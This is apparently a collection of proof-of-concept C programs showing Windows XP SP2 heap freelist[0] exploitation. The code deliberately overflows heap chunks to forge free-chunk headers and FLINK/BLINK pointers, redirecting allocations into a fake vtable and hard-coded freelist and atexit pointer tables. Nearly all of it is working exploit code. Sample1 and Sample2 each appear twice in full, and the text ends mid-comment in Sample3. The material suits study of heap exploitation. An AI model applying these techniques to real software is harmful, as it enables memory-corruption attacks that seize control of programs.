/*
Sample1.c
Exploiting Freelist[0] On XP Service Pack 2
brett.moore@security-assessment.com
Exploiting Freelist[0] ReLinking
Modify the header of a chunk that sits in freelist[0]
This sample overwrites the header of the Last free Chunk.
The header is overwritten with a size large enough for the request.
The FLINK is overwritten with the location that the address of the
split chunk will be returned to.
*/
#include <stdio.h>
#include <windows.h>
// Shared state for the demo: written by main() and create_vTable(), read by BlowHeap() and the asm calls in main().
DWORD ptr1; // Holds the address of func[]; main() calls through it, and BlowHeap() points newFLINK at &ptr1 - 4
DWORD ptr2; // Also set to func[] in main(), but never read afterwards
DWORD func[20]; // Fake virtual function table filled by create_vTable(); each slot is a callback address stored as a DWORD (32-bit assumption)
long hHeap; // Handle returned by HeapCreate(); declared long rather than HANDLE, which only round-trips on a 32-bit build
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback1()
{
    fputs("Callback 1...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback2()
{
    fputs("Callback 2...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback3()
{
    fputs("Callback 3...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback4()
{
    fputs("Callback 4...\n", stdout);
}
/*
 * Sample1 demo body: allocate chunk A, copy 0x50 bytes into its 0x10-byte
 * allocation (so the copy runs past A into the header and FLINK/BLINK of the
 * last free chunk), then allocate B so the heap splits that chunk.  Per the
 * original comments, the split writes the new chunk's address to [newFLINK],
 * which is set to &ptr1 - 4.  Uses globals hHeap and ptr1.  32-bit only:
 * addresses are carried in DWORDs and every offset is hard-coded.
 * memset()/memcpy() come from <string.h>, which is not included directly here
 * -- TODO confirm it arrives via <windows.h>.
 */
void BlowHeap()
{
char *a,*b; // b is printed before it is assigned (see below)
char overflow[0x3000]; // Scratch buffer; only bytes [0, 0x50) are initialised and copied
DWORD newFLINK; // The address that will be overwritten
printf("Alloc A\n"); // Alloc a chunk
a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10); // NULL return is not checked
printf("a=%x\tb=%x\n",a,b); // NOTE(review): b is uninitialised here (undefined behaviour); %x with pointer arguments is a format mismatch
// Overwrite the last free chunk
printf("Overflowing chunk A into last free chunk\n");
newFLINK = &ptr1; // Set the new flink (address of a DWORD global stored in a DWORD: 32-bit assumption)
newFLINK = newFLINK -4; // Adjust
// Set up overflow: bytes [0,0x10) are filler; [0x10,0x20) mimic the free chunk's header and links
memset(overflow,0x58,0x50);
overflow[0x10] = 0x10; // Size of this block
overflow[0x11] = 0x01;
overflow[0x12] = 0x10; // Size of previous block
overflow[0x13] = 0x01;
overflow[0x14] = 0x99;
overflow[0x15] = 0x99;
overflow[0x16] = 0x99;
overflow[0x17] = 0x99;
*(DWORD *) &overflow[0x18] = newFLINK; // Put it in FLINK
*(DWORD *) &overflow[0x1c] = newFLINK; // Put it in BLINK
// Do the overflow
memcpy(a,overflow,0x50); // 0x50 bytes into a 0x10-byte allocation: deliberate out-of-bounds write. Overflow chunk A, overwrite header and data of last free chunk
// When block B is allocated, the last free chunk will be split.
// The address of the split chunk will be written to [newFLINK]
printf("Alloc B\n");
b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x5); // Any amount will do as no lookaside/freelist yet
printf("a=%x\tb=%x\n",a,b);
}
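/*
 * Fill func[] so it can serve as a fake vtable: slots 0-3 get
 * callback1..callback4, every remaining slot gets callback1.
 * Fix: the original wrote "(DWORD) func[i] = ...", a cast applied to an
 * lvalue, which is an MSVC extension rather than standard C; func[] is
 * already DWORD so the cast is simply dropped.  The slot count is taken from
 * the array instead of the literal 20.  Storing a function address in a DWORD
 * assumes a 32-bit build.
 */
void create_vTable()
{
    size_t x;
    const size_t slots = sizeof func / sizeof func[0];
    printf("Creating Virtual Function Table\n");
    func[0] = (DWORD) &callback1;
    func[1] = (DWORD) &callback2;
    func[2] = (DWORD) &callback3;
    func[3] = (DWORD) &callback4;
    for (x = 4; x < slots; x++) {
        func[x] = (DWORD) &callback1;
    }
}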
/*
 * Entry point.  Creates a private heap, builds the fake vtable in func[],
 * calls through it via MSVC inline asm (ECX = ptr1, then the slot at byte
 * offset 8, i.e. func[2]) both before and after BlowHeap(), and destroys the
 * heap.  argc/argv are unused; exit(0) ends the process so the return is
 * never reached.  MSVC/x86-only because of _asm.
 */
int main(int argc,char *argv[])
{
printf("===========================================\n");
printf("Exploiting Freelist[0] On XP Service Pack 2\n");
printf("brett.moore@security-assessment.com\n");
printf("Starting Sample1.c\n");
printf("\tExploiting Freelist[0] ReLinking\n");
printf("===========================================\n\n");
hHeap = HeapCreate(0,0,0); // HANDLE stored in a long (32-bit only); a NULL result is not checked
printf("Heap created: 0x%xh\n",hHeap); // %x with a long argument: format/type mismatch
create_vTable();
printf("vTable @ 0x%xh\n",&func); // %x with a pointer argument
ptr1 = func; // func decays to a pointer and is stored in a DWORD (pointer-to-integer, 32-bit assumption)
ptr2= func; // Set but never read
// Call through the vTable
printf("Doing vTable call\n");
printf("Ptr1 @ 0x%xh set to 0x%xh\n",&ptr1,ptr1);
// ECX = the table address held in ptr1, then call the slot at byte offset 8 (func[2], which create_vTable() set to callback3)
_asm mov ECX,ptr1
_asm call [ECX+ (4*2)]
BlowHeap();
// Call through the vTable again; ptr1 is printed so any change made during BlowHeap() is visible
printf("Doing vTable call\n");
printf("Ptr1 @ 0x%xh set to 0x%xh\n",&ptr1,ptr1);
_asm mov ECX,ptr1
_asm call [ECX+ (4*2)]
printf("Destroying Heap\n");
HeapDestroy(hHeap);
printf("Exiting\n");
exit(0); // exit() is declared in <stdlib.h>, which this file does not include directly -- TODO confirm it arrives via <windows.h>
}
/*
Sample1.c
Exploiting Freelist[0] On XP Service Pack 2
brett.moore@security-assessment.com
Exploiting Freelist[0] ReLinking
Modify the header of a chunk that sits in freelist[0]
This sample overwrites the header of the Last free Chunk.
The header is overwritten with a size large enough for the request.
The FLINK is overwritten with the location that the address of the
split chunk will be returned to.
*/
#include <stdio.h>
#include <windows.h>
// Shared state for the demo: written by main() and create_vTable(), read by BlowHeap() and the asm calls in main().
DWORD ptr1; // Holds the address of func[]; main() calls through it, and BlowHeap() points newFLINK at &ptr1 - 4
DWORD ptr2; // Also set to func[] in main(), but never read afterwards
DWORD func[20]; // Fake virtual function table filled by create_vTable(); each slot is a callback address stored as a DWORD (32-bit assumption)
long hHeap; // Handle returned by HeapCreate(); declared long rather than HANDLE, which only round-trips on a 32-bit build
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback1()
{
    fputs("Callback 1...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback2()
{
    fputs("Callback 2...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback3()
{
    fputs("Callback 3...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback4()
{
    fputs("Callback 4...\n", stdout);
}
/*
 * Sample1 demo body: allocate chunk A, copy 0x50 bytes into its 0x10-byte
 * allocation (so the copy runs past A into the header and FLINK/BLINK of the
 * last free chunk), then allocate B so the heap splits that chunk.  Per the
 * original comments, the split writes the new chunk's address to [newFLINK],
 * which is set to &ptr1 - 4.  Uses globals hHeap and ptr1.  32-bit only:
 * addresses are carried in DWORDs and every offset is hard-coded.
 * memset()/memcpy() come from <string.h>, which is not included directly here
 * -- TODO confirm it arrives via <windows.h>.
 */
void BlowHeap()
{
char *a,*b; // b is printed before it is assigned (see below)
char overflow[0x3000]; // Scratch buffer; only bytes [0, 0x50) are initialised and copied
DWORD newFLINK; // The address that will be overwritten
printf("Alloc A\n"); // Alloc a chunk
a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10); // NULL return is not checked
printf("a=%x\tb=%x\n",a,b); // NOTE(review): b is uninitialised here (undefined behaviour); %x with pointer arguments is a format mismatch
// Overwrite the last free chunk
printf("Overflowing chunk A into last free chunk\n");
newFLINK = &ptr1; // Set the new flink (address of a DWORD global stored in a DWORD: 32-bit assumption)
newFLINK = newFLINK -4; // Adjust
// Set up overflow: bytes [0,0x10) are filler; [0x10,0x20) mimic the free chunk's header and links
memset(overflow,0x58,0x50);
overflow[0x10] = 0x10; // Size of this block
overflow[0x11] = 0x01;
overflow[0x12] = 0x10; // Size of previous block
overflow[0x13] = 0x01;
overflow[0x14] = 0x99;
overflow[0x15] = 0x99;
overflow[0x16] = 0x99;
overflow[0x17] = 0x99;
*(DWORD *) &overflow[0x18] = newFLINK; // Put it in FLINK
*(DWORD *) &overflow[0x1c] = newFLINK; // Put it in BLINK
// Do the overflow
memcpy(a,overflow,0x50); // 0x50 bytes into a 0x10-byte allocation: deliberate out-of-bounds write. Overflow chunk A, overwrite header and data of last free chunk
// When block B is allocated, the last free chunk will be split.
// The address of the split chunk will be written to [newFLINK]
printf("Alloc B\n");
b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x5); // Any amount will do as no lookaside/freelist yet
printf("a=%x\tb=%x\n",a,b);
}
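/*
 * Fill func[] so it can serve as a fake vtable: slots 0-3 get
 * callback1..callback4, every remaining slot gets callback1.
 * Fix: the original wrote "(DWORD) func[i] = ...", a cast applied to an
 * lvalue, which is an MSVC extension rather than standard C; func[] is
 * already DWORD so the cast is simply dropped.  The slot count is taken from
 * the array instead of the literal 20.  Storing a function address in a DWORD
 * assumes a 32-bit build.
 */
void create_vTable()
{
    size_t x;
    const size_t slots = sizeof func / sizeof func[0];
    printf("Creating Virtual Function Table\n");
    func[0] = (DWORD) &callback1;
    func[1] = (DWORD) &callback2;
    func[2] = (DWORD) &callback3;
    func[3] = (DWORD) &callback4;
    for (x = 4; x < slots; x++) {
        func[x] = (DWORD) &callback1;
    }
}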
/*
 * Entry point.  Creates a private heap, builds the fake vtable in func[],
 * calls through it via MSVC inline asm (ECX = ptr1, then the slot at byte
 * offset 8, i.e. func[2]) both before and after BlowHeap(), and destroys the
 * heap.  argc/argv are unused; exit(0) ends the process so the return is
 * never reached.  MSVC/x86-only because of _asm.
 */
int main(int argc,char *argv[])
{
printf("===========================================\n");
printf("Exploiting Freelist[0] On XP Service Pack 2\n");
printf("brett.moore@security-assessment.com\n");
printf("Starting Sample1.c\n");
printf("\tExploiting Freelist[0] ReLinking\n");
printf("===========================================\n\n");
hHeap = HeapCreate(0,0,0); // HANDLE stored in a long (32-bit only); a NULL result is not checked
printf("Heap created: 0x%xh\n",hHeap); // %x with a long argument: format/type mismatch
create_vTable();
printf("vTable @ 0x%xh\n",&func); // %x with a pointer argument
ptr1 = func; // func decays to a pointer and is stored in a DWORD (pointer-to-integer, 32-bit assumption)
ptr2= func; // Set but never read
// Call through the vTable
printf("Doing vTable call\n");
printf("Ptr1 @ 0x%xh set to 0x%xh\n",&ptr1,ptr1);
// ECX = the table address held in ptr1, then call the slot at byte offset 8 (func[2], which create_vTable() set to callback3)
_asm mov ECX,ptr1
_asm call [ECX+ (4*2)]
BlowHeap();
// Call through the vTable again; ptr1 is printed so any change made during BlowHeap() is visible
printf("Doing vTable call\n");
printf("Ptr1 @ 0x%xh set to 0x%xh\n",&ptr1,ptr1);
_asm mov ECX,ptr1
_asm call [ECX+ (4*2)]
printf("Destroying Heap\n");
HeapDestroy(hHeap);
printf("Exiting\n");
exit(0); // exit() is declared in <stdlib.h>, which this file does not include directly -- TODO confirm it arrives via <windows.h>
}
/*
Sample2.c
Exploiting Freelist[0] On XP Service Pack 2
brett.moore@security-assessment.com
Exploiting Freelist[0] Searching
Modify the header of a chunk that sits in freelist[0]
This sample overwrites the header of the first chunk in freelist[0]
The header is overwritten with a size that is too small for the request.
The FLINK is overwritten with the location that will be returned to the alloc.
*/
#include <stdio.h>
#include <windows.h>
// Shared state for the demo: written by main() and create_vTable(), read by BlowHeap() and the asm calls in main().
DWORD func[20]; // Fake virtual function table filled by create_vTable(); each slot is a callback address stored as a DWORD (32-bit assumption)
long hHeap; // Handle returned by HeapCreate(); declared long rather than HANDLE, which only round-trips on a 32-bit build
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback1()
{
    fputs("Callback 1...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback2()
{
    fputs("Callback 2...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback3()
{
    fputs("Callback 3...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback4()
{
    fputs("Callback 4...\n", stdout);
}
/*
 * Sample2 demo body: allocate A, B (large) and C, free B, then copy 0x1c
 * bytes into A's 0x10-byte allocation so the copy overwrites the header and
 * FLINK (but not BLINK) of the freed chunk.  Per the original comments the
 * next HeapAlloc() then returns newFLINK (&func + 8) instead of heap memory,
 * so the strcpy() at the end lands in func[].  Uses globals hHeap and func.
 * 32-bit only: addresses are carried in DWORDs.  memset()/memcpy()/strcpy()
 * come from <string.h>, not included directly -- TODO confirm via <windows.h>.
 */
void BlowHeap()
{
char *a,*b,*c; // b and c are printed before they are assigned (see below)
char overflow[0x3000]; // Scratch buffer; only bytes [0, 0x20) are initialised
DWORD newFLINK; // The address that will be returned
printf("Alloc A\n"); // Alloc a chunk
a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10); // NULL return is not checked (same for every HeapAlloc below)
printf("a=%x\tb=%x\tc=%x\n",a,b,c); // NOTE(review): b and c are uninitialised here (undefined behaviour); %x with pointer arguments is a format mismatch
printf("Alloc B\n"); // Alloc a large chunk so freed to freelist[0]
b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x1200);
printf("a=%x\tb=%x\tc=%x\n",a,b,c); // c still uninitialised
printf("Alloc C\n"); // Alloc a 2nd chunk so that B is not coalesced
c = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x30);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
printf("Freeing b\n"); // Free B to freelist[0]; b is dangling from here until it is reassigned below
HeapFree(hHeap,0,b);
printf("Overflowing chunk A\n"); // Overflow chunk A, overwrite header of last free chunk
newFLINK = &func; // Set the new flink (array address stored in a DWORD: 32-bit assumption)
newFLINK += 8; // Adjust
// Set up overflow: bytes [0,0x10) are filler; [0x10,0x1c) mimic the freed chunk's header and FLINK
memset(overflow,0x48,0x20);
overflow[0x10] = 0x01; // Size of this block (SMALL)
overflow[0x11] = 0x00;
overflow[0x12] = 0x01; // Size of previous block
overflow[0x13] = 0x00;
overflow[0x14] = 0x80;
overflow[0x15] = 0x80;
overflow[0x16] = 0x80;
overflow[0x17] = 0x80;
*(DWORD *) &overflow[0x18] = newFLINK; // Put it in FLINK
// Do the overflow
memcpy(a,overflow,0x20-4); // 0x1c bytes into a 0x10-byte allocation: deliberate out-of-bounds write. Overwrite FLINK but not BLINK
// When block B is allocated, the overwritten chunk will be checked.
// The address newFLINK will be returned to the alloc
printf("Alloc B\n");
b = HeapAlloc(hHeap,0,0x20);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
// Any data written into B will overwrite the data at newFlink
strcpy(b,"XXXXXXXXXXXXXXXX"); // Writes 16 'X' bytes plus the terminating NUL (17 bytes) to wherever b points
}
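/*
 * Fill func[] so it can serve as a fake vtable: slots 0-3 get
 * callback1..callback4, every remaining slot gets callback1, and slots 0 and
 * 1 are then overwritten with the plain integers 5 and 6 (kept from the
 * original; the asm call in main() goes through byte offset 8, i.e. slot 2,
 * which is left intact).
 * Fix: the original wrote "(DWORD) func[i] = ...", a cast applied to an
 * lvalue, which is an MSVC extension rather than standard C; func[] is
 * already DWORD so the cast is simply dropped.  The slot count is taken from
 * the array instead of the literal 20.  Storing a function address in a DWORD
 * assumes a 32-bit build.
 */
void create_vTable()
{
    size_t x;
    const size_t slots = sizeof func / sizeof func[0];
    printf("Creating Virtual Function Table\n");
    func[0] = (DWORD) &callback1;
    func[1] = (DWORD) &callback2;
    func[2] = (DWORD) &callback3;
    func[3] = (DWORD) &callback4;
    for (x = 4; x < slots; x++) {
        func[x] = (DWORD) &callback1;
    }
    func[0] = 5;
    func[1] = 6;
}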
/*
 * Entry point.  Creates a private heap, builds the fake vtable in func[],
 * calls through it via MSVC inline asm (the slot at byte offset 8, i.e.
 * func[2]) both before and after BlowHeap(), and destroys the heap.
 * argc/argv are unused; exit(0) ends the process so the return is never
 * reached.  MSVC/x86-only because of _asm.
 */
int main(int argc,char *argv[])
{
printf("===========================================\n");
printf("Exploiting Freelist[0] On XP Service Pack 2\n");
printf("brett.moore@security-assessment.com\n");
printf("Starting Sample2.c\n");
printf("\tExploiting Freelist[0] Searching\n");
printf("===========================================\n\n");
hHeap = HeapCreate(0,0,0); // HANDLE stored in a long (32-bit only); a NULL result is not checked
printf("Heap created: 0x%xh\n",hHeap); // %x with a long argument: format/type mismatch
create_vTable();
printf("vTable @ 0x%xh\n",&func); // %x with a pointer argument
// Call through the vTable: the slot at byte offset 8 (func[2], which create_vTable() set to callback3)
printf("Doing vTable call\n");
_asm call func[4*2];
BlowHeap();
// Call through the vTable again, same slot; any change made to func[] during BlowHeap() takes effect here
printf("Doing vTable call\n");
_asm call func[4*2];
printf("Destroying Heap\n");
HeapDestroy(hHeap);
printf("Exiting\n");
exit(0); // exit() is declared in <stdlib.h>, which this file does not include directly -- TODO confirm it arrives via <windows.h>
}
/*
Sample2.c
Exploiting Freelist[0] On XP Service Pack 2
brett.moore@security-assessment.com
Exploiting Freelist[0] Searching
Modify the header of a chunk that sits in freelist[0]
This sample overwrites the header of the first chunk in freelist[0]
The header is overwritten with a size that is too small for the request.
The FLINK is overwritten with the location that will be returned to the alloc.
*/
#include <stdio.h>
#include <windows.h>
// Shared state for the demo: written by main() and create_vTable(), read by BlowHeap() and the asm calls in main().
DWORD func[20]; // Fake virtual function table filled by create_vTable(); each slot is a callback address stored as a DWORD (32-bit assumption)
long hHeap; // Handle returned by HeapCreate(); declared long rather than HANDLE, which only round-trips on a 32-bit build
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback1()
{
    fputs("Callback 1...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback2()
{
    fputs("Callback 2...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback3()
{
    fputs("Callback 3...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback4()
{
    fputs("Callback 4...\n", stdout);
}
/*
 * Sample2 demo body: allocate A, B (large) and C, free B, then copy 0x1c
 * bytes into A's 0x10-byte allocation so the copy overwrites the header and
 * FLINK (but not BLINK) of the freed chunk.  Per the original comments the
 * next HeapAlloc() then returns newFLINK (&func + 8) instead of heap memory,
 * so the strcpy() at the end lands in func[].  Uses globals hHeap and func.
 * 32-bit only: addresses are carried in DWORDs.  memset()/memcpy()/strcpy()
 * come from <string.h>, not included directly -- TODO confirm via <windows.h>.
 */
void BlowHeap()
{
char *a,*b,*c; // b and c are printed before they are assigned (see below)
char overflow[0x3000]; // Scratch buffer; only bytes [0, 0x20) are initialised
DWORD newFLINK; // The address that will be returned
printf("Alloc A\n"); // Alloc a chunk
a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10); // NULL return is not checked (same for every HeapAlloc below)
printf("a=%x\tb=%x\tc=%x\n",a,b,c); // NOTE(review): b and c are uninitialised here (undefined behaviour); %x with pointer arguments is a format mismatch
printf("Alloc B\n"); // Alloc a large chunk so freed to freelist[0]
b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x1200);
printf("a=%x\tb=%x\tc=%x\n",a,b,c); // c still uninitialised
printf("Alloc C\n"); // Alloc a 2nd chunk so that B is not coalesced
c = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x30);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
printf("Freeing b\n"); // Free B to freelist[0]; b is dangling from here until it is reassigned below
HeapFree(hHeap,0,b);
printf("Overflowing chunk A\n"); // Overflow chunk A, overwrite header of last free chunk
newFLINK = &func; // Set the new flink (array address stored in a DWORD: 32-bit assumption)
newFLINK += 8; // Adjust
// Set up overflow: bytes [0,0x10) are filler; [0x10,0x1c) mimic the freed chunk's header and FLINK
memset(overflow,0x48,0x20);
overflow[0x10] = 0x01; // Size of this block (SMALL)
overflow[0x11] = 0x00;
overflow[0x12] = 0x01; // Size of previous block
overflow[0x13] = 0x00;
overflow[0x14] = 0x80;
overflow[0x15] = 0x80;
overflow[0x16] = 0x80;
overflow[0x17] = 0x80;
*(DWORD *) &overflow[0x18] = newFLINK; // Put it in FLINK
// Do the overflow
memcpy(a,overflow,0x20-4); // 0x1c bytes into a 0x10-byte allocation: deliberate out-of-bounds write. Overwrite FLINK but not BLINK
// When block B is allocated, the overwritten chunk will be checked.
// The address newFLINK will be returned to the alloc
printf("Alloc B\n");
b = HeapAlloc(hHeap,0,0x20);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
// Any data written into B will overwrite the data at newFlink
strcpy(b,"XXXXXXXXXXXXXXXX"); // Writes 16 'X' bytes plus the terminating NUL (17 bytes) to wherever b points
}
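/*
 * Fill func[] so it can serve as a fake vtable: slots 0-3 get
 * callback1..callback4, every remaining slot gets callback1, and slots 0 and
 * 1 are then overwritten with the plain integers 5 and 6 (kept from the
 * original; the asm call in main() goes through byte offset 8, i.e. slot 2,
 * which is left intact).
 * Fix: the original wrote "(DWORD) func[i] = ...", a cast applied to an
 * lvalue, which is an MSVC extension rather than standard C; func[] is
 * already DWORD so the cast is simply dropped.  The slot count is taken from
 * the array instead of the literal 20.  Storing a function address in a DWORD
 * assumes a 32-bit build.
 */
void create_vTable()
{
    size_t x;
    const size_t slots = sizeof func / sizeof func[0];
    printf("Creating Virtual Function Table\n");
    func[0] = (DWORD) &callback1;
    func[1] = (DWORD) &callback2;
    func[2] = (DWORD) &callback3;
    func[3] = (DWORD) &callback4;
    for (x = 4; x < slots; x++) {
        func[x] = (DWORD) &callback1;
    }
    func[0] = 5;
    func[1] = 6;
}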
/*
 * Entry point.  Creates a private heap, builds the fake vtable in func[],
 * calls through it via MSVC inline asm (the slot at byte offset 8, i.e.
 * func[2]) both before and after BlowHeap(), and destroys the heap.
 * argc/argv are unused; exit(0) ends the process so the return is never
 * reached.  MSVC/x86-only because of _asm.
 */
int main(int argc,char *argv[])
{
printf("===========================================\n");
printf("Exploiting Freelist[0] On XP Service Pack 2\n");
printf("brett.moore@security-assessment.com\n");
printf("Starting Sample2.c\n");
printf("\tExploiting Freelist[0] Searching\n");
printf("===========================================\n\n");
hHeap = HeapCreate(0,0,0); // HANDLE stored in a long (32-bit only); a NULL result is not checked
printf("Heap created: 0x%xh\n",hHeap); // %x with a long argument: format/type mismatch
create_vTable();
printf("vTable @ 0x%xh\n",&func); // %x with a pointer argument
// Call through the vTable: the slot at byte offset 8 (func[2], which create_vTable() set to callback3)
printf("Doing vTable call\n");
_asm call func[4*2];
BlowHeap();
// Call through the vTable again, same slot; any change made to func[] during BlowHeap() takes effect here
printf("Doing vTable call\n");
_asm call func[4*2];
printf("Destroying Heap\n");
HeapDestroy(hHeap);
printf("Exiting\n");
exit(0); // exit() is declared in <stdlib.h>, which this file does not include directly -- TODO confirm it arrives via <windows.h>
}
/*
Sample3.c
Exploiting Freelist[0] On XP Service Pack 2
brett.moore@security-assessment.com
Exploiting Freelist[0] Searching
Overwriting atexit pointers
Modify the header of a chunk that sits in freelist[0]
This sample overwrites the header of the first chunk in freelist[0]
The header is overwritten with a size that is too small for the request.
The FLINK is overwritten with the location that will be returned to the alloc.
To overwrite the atexit() ptr table we will:
1. overwrite a chunk in freelist[0]
2. exploit the freelist[0] searching routine to
return a pointer to the heap freelists
3. overwrite the freelists with a pointer to the atexit() ptr table
4. overwrite the atexit() ptr table to point to a portion of itself
containing the code to execute.
*/
#include <stdio.h>
#include <windows.h>
// Shared state for the demo: written by main() and create_vTable(), read by BlowHeap() and the asm calls in main().
DWORD func[20]; // Fake virtual function table filled by create_vTable(); each slot is a callback address stored as a DWORD (32-bit assumption)
long hHeap; // Handle returned by HeapCreate(); declared long rather than HANDLE, which only round-trips on a 32-bit build
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback1()
{
    fputs("Callback 1...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback2()
{
    fputs("Callback 2...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback3()
{
    fputs("Callback 3...\n", stdout);
}
/* Vtable slot filler: prints a marker so a call through func[] is visible on stdout. */
void callback4()
{
    fputs("Callback 4...\n", stdout);
}
/*
 * Sample3 demo body.  Same set-up as Sample2 (alloc A, B, C; free B; copy
 * 0x1c bytes into A so the freed chunk's header and FLINK are overwritten),
 * but newFLINK is a hard-coded address the original comment identifies as the
 * heap's freelists[].  The original comments then describe: the 0xCB8-byte
 * alloc returns that address, 256 bytes of a second hard-coded address (the
 * atexit pointer table) are copied over it, a further alloc returns a pointer
 * into that table, and 0x30 bytes are written there.  Every address here is
 * specific to the build the author used; nothing is computed at run time, so
 * the demo does not transfer even between builds.  Uses global hHeap.
 * memset()/memcpy() come from <string.h>, not included directly -- TODO
 * confirm via <windows.h>.
 */
void BlowHeap()
{
int x;
char *a,*b,*c,*d; // b and c are printed before they are assigned (see below)
char overflow[0x3000]; // Scratch buffer reused for each of the three copies below
DWORD newFLINK; // The address that will be returned
printf("Alloc A\n"); // Alloc a chunk
a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10); // NULL return is not checked (same for every HeapAlloc below)
printf("a=%x\tb=%x\tc=%x\n",a,b,c); // NOTE(review): b and c are uninitialised here (undefined behaviour); %x with pointer arguments is a format mismatch
printf("Alloc B\n"); // Alloc a large chunk so freed to freelist[0]
b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x1200);
printf("a=%x\tb=%x\tc=%x\n",a,b,c); // c still uninitialised
printf("Alloc C\n"); // Alloc a 2nd chunk so that B is not coalesced
c = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x30);
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
printf("Freeing b\n"); // Free B to freelist[0]; b is dangling from here until it is reassigned below
HeapFree(hHeap,0,b);
printf("Overflowing chunk A\n"); // Overflow chunk A, overwrite header of last free chunk
newFLINK = 0x00340198; // Set the new FLINK to the freelists[] (hard-coded for the author's build)
newFLINK += 8; // Adjust
// Set up overflow: bytes [0,0x10) are filler; [0x10,0x1c) mimic the freed chunk's header and FLINK
memset(overflow,0x48,0x20);
overflow[0x10] = 0x01; // Size of this block (SMALL)
overflow[0x11] = 0x00;
overflow[0x12] = 0x01; // Size of previous block
overflow[0x13] = 0x00;
overflow[0x14] = 0x80;
overflow[0x15] = 0x80;
overflow[0x16] = 0x80;
overflow[0x17] = 0x80;
*(DWORD *) &overflow[0x18] = newFLINK; // Put it in FLINK
// Do the overflow
memcpy(a,overflow,0x20-4); // 0x1c bytes into a 0x10-byte allocation: deliberate out-of-bounds write. Overwrite FLINK but not BLINK
printf("Alloc B\n"); // This alloc will return the address of the freelists[]
b = HeapAlloc(hHeap,0,0xCB8); // 3256 bytes
printf("a=%x\tb=%x\tc=%x\n",a,b,c);
// Set up buffer: all 0x3000 bytes zeroed, then the first 256 bytes filled with one repeated address
memset(overflow,0x0,0x3000);
for(x=0;x<256;x+=4)
{
*(DWORD *) &overflow[x] = 0x40C0D0; // Overwrite with address of atexit ptrs (hard-coded for the author's build)
}
// copy it in
// This will overwrite the freelist structures (only 256 bytes are copied, not the 3256 of the allocation)
memcpy(b,overflow,256);
// This will return a ptr to the atexit pointers
printf("Alloc D\n");
d = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x30);
printf("a=%x\tb=%x\tc=%x\td=%x\n",a,b,c,d);
// Now lets overwrite the AtExit Ptr Table
// Set up buffer of input size (48 bytes): four DWORDs followed by 0xCC filler
memset(overflow,0xCC,0x30);
*(DWORD *) &overflow[0] = 0x40C0D8+4; // 4 greater than lower pointer
*(DWORD *) &overflow[4] = 0x40C0D8; // Lower Pointer
*(DWORD *) &overflow[8] = 0x40C0D8+4; // ptr to Code to execute
*(DWORD *) &overflow[12]= 0xCCCCCCCC; // Code to execute (0xCC is the x86 int3 opcode, so a hit shows up as a debugger break rather than running anything)
// Overwrite atExit Pointers
memcpy(d,overflow,0x30);
}
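/*
 * Fill func[] so it can serve as a fake vtable: slots 0-3 get
 * callback1..callback4, every remaining slot gets callback1, and slots 0 and
 * 1 are then overwritten with the plain integers 5 and 6 (kept from the
 * original; the asm call in main() goes through byte offset 8, i.e. slot 2,
 * which is left intact).
 * Fix: the original wrote "(DWORD) func[i] = ...", a cast applied to an
 * lvalue, which is an MSVC extension rather than standard C; func[] is
 * already DWORD so the cast is simply dropped.  The slot count is taken from
 * the array instead of the literal 20.  Storing a function address in a DWORD
 * assumes a 32-bit build.
 */
void create_vTable()
{
    size_t x;
    const size_t slots = sizeof func / sizeof func[0];
    printf("Creating Virtual Function Table\n");
    func[0] = (DWORD) &callback1;
    func[1] = (DWORD) &callback2;
    func[2] = (DWORD) &callback3;
    func[3] = (DWORD) &callback4;
    for (x = 4; x < slots; x++) {
        func[x] = (DWORD) &callback1;
    }
    func[0] = 5;
    func[1] = 6;
}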
/* Registered with atexit() in main(); prints a marker when the process exits through the CRT. */
void ExitFunction()
{
    fputs("Exiting\n", stdout);
}
/*
 * Entry point.  Registers ExitFunction() with atexit(), creates a private
 * heap, builds the fake vtable in func[], calls through it via MSVC inline
 * asm (the slot at byte offset 8, i.e. func[2]) both before and after
 * BlowHeap(), and destroys the heap.  argc/argv are unused; exit(0) ends the
 * process (running the atexit handlers) so the return is never reached.
